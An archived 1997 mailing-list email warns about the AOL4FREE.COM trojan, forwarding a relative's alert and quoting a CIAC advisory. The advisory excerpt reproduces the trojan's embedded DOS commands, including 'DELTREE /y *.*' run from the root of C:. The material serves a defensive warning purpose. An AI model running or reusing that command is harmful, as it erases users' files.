X-POP3-Rcpt: blipvert@h15
Return-Path: <owner-electronica@noether.ex.ac.uk>
Received: from hermes.ex.ac.uk (hermes.ex.ac.uk [194.83.11.25])
by h15.snider.net (8.8.4/8.8.4) with SMTP
id NAA28907 for <blipvert@snider.net>; Fri, 18 Apr 1997 13:41:58 -0600
Received: from noether [144.173.8.10] by hermes via SMTP (TAA26048); Fri, 18 Apr 1997 19:36:10 +0100
Received: from hermes.ex.ac.uk by maths.exeter.ac.uk; Fri, 18 Apr 97 19:35:37 +0100
Received: from atomic@netcom23.netcom.com [192.100.81.137] by hermes via ESMTP (TAA26009); Fri, 18 Apr 1997 19:35:36 +0100
Received: (from atomic@localhost) by netcom23.netcom.com (8.6.13/Netcom)
id LAA25396; Fri, 18 Apr 1997 11:35:22 -0700
From: atomic@netcom.com (Mike Metlay ++ Atomic City)
Message-Id: <199704181835.LAA25396@netcom23.netcom.com>
Subject: TROJAN HORSE ALERT!
To: emusic-l@american.edu (EMUSIC-L), synth-l@american.edu (SYNTH-L),
analogue@hyperreal.com (Analogue Heaven Mailing List),
electronica@noether.ex.ac.uk (Electronica List)
Date: Fri, 18 Apr 1997 11:35:21 -0700 (PDT)
Reply-To: atomic@netcom.com
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-electronica@noether.ex.ac.uk
Precedence: bulk
Hi, everyone. Most of you probably have heard me take a strong stance
against redistributing rumors about "email viruses" and other unproven
nastinesses waiting to scare people, if not actually harm their
computers. So when *I* blow the whistle, I hope it'll be taken seriously.
I have received the following email from my older brother, who does
virus-watch for part of the University of Rochester's medical school
(among other things), and have checked out the Web site in question
myself. This one's legit, newly discovered, and warnings should be
sent far and wide, as long as all of them cite the Website URL where
information updates can be obtained. In other words, "Good TImes" be
hanged, this one ain't no hoax.
*** begin quote ***
From lmetlay@acu.pathology.rochester.edu Fri Apr 18 10:34:46 1997
quoted 33 lines Friends-
>
>Friends-
>
>Once upon a time there was a hacker who wrote a Macintosh program called
>AOL4FREE which allowed users to avoid AOL connect-time charges.
>
>Then someone started an email hoax claiming that there was an "email virus"
>that would erase your hard disk if you read the message. This is really a
>hoax.
>
>But, life imitates art...
>
>The CIAC announced on 4/17 that they have gotten a DOS/Windows program
>called AOL4FREE.COM that will erase the users hard disk. It has to be
>executed in order to do any damage. Reading an email will not cause harm
>but if the program is received as an email attachment, opening the
>attachment will cause the Trojan horse to execute. Those of you who are
>DOS/Windows users, please be careful.
>
>For more information check out the CIAC alert:
>http://ciac.llnl.gov/ciac/bulletins/h-47a.shtml
>
>Leon
>
>--
>Leon A. Metlay, M.D.,Associate Professor of Pathology and Laboratory Medicine
>University of Rochester Medical Center Phone: (716) 275-5691
>P.O. Box 626 Fax: (716) 273-1027
>Rochester, NY 14642 lmetlay@acu.pathology.rochester.edu
>http://www.urmc.rochester.edu/smd/pathres/URPLM.html
>"Flame a newbie for passing along a hoax, and you add to the spam. Teach a
>newbie to investigate a virus warning and you increase the peace."- me
>Check out: http://ciac.llnl.gov/ciac/CIACVirusDatabase.html
*** end quote ***
From the CIAC's Website, I cut and pasted in only a brief part of the
extensive warning message and background data on this little ratbag.
It reads:
***
AOL4FREE.COM is a Trojan program that is 993 bytes (2 sectors) long.
The following text is readable in the AOL4FREE.COM file
if you display it with the DOS TYPE command or the DOS EDIT program.
Compiled by BAT2EXEC 1.5
PC Magazine . Douglas Boling
Note that this text may appear in any program compiled with the BAT2EXEC
program and has nothing to do with the Trojan Horse.
If you open the AOL4FREE.COM file with a disk editor or with the Windows
Notepad program, the following text is found at the end of the second sector
of the file.
PATH
COMMANDC earc
/C C:
/C CD\
DELTREE /y *.*
ECHO YOUR COMPUTER HAS JUST BEEN F***ED BY *VP* F*** YOU AOL-LAMER
Where F*** is a common vulgar explicative.
***
The message goes on to say that AOL4FREE.COM can not do any damage
unless you run it, but as noted above, opening an email attachment is
equivalent to running it. If you run it accidentally and immediately
press Control-C, some of your files MAY be saved, but if you wait long
enough to see the message, your C: drive will be shot to hell.
That's a very basic distillation of the whole story, which gets more
confusing because of the existence of the "AOL4FREE" hoax. Please read
the Web page for more data if you have any confusion at all about this.
mike
--
Mike Metlay - ATOMIC CITY - P. O. Box 81175, Pittsburgh, PA 15217-0675 USA
= atomic@netcom.com --
http://pd.net/atomic-city -- 800.924.ATOM =
CD orders via LOFTY PURSUITS: 800.548.6724 & 904.385.6463, FAX 904.668.5825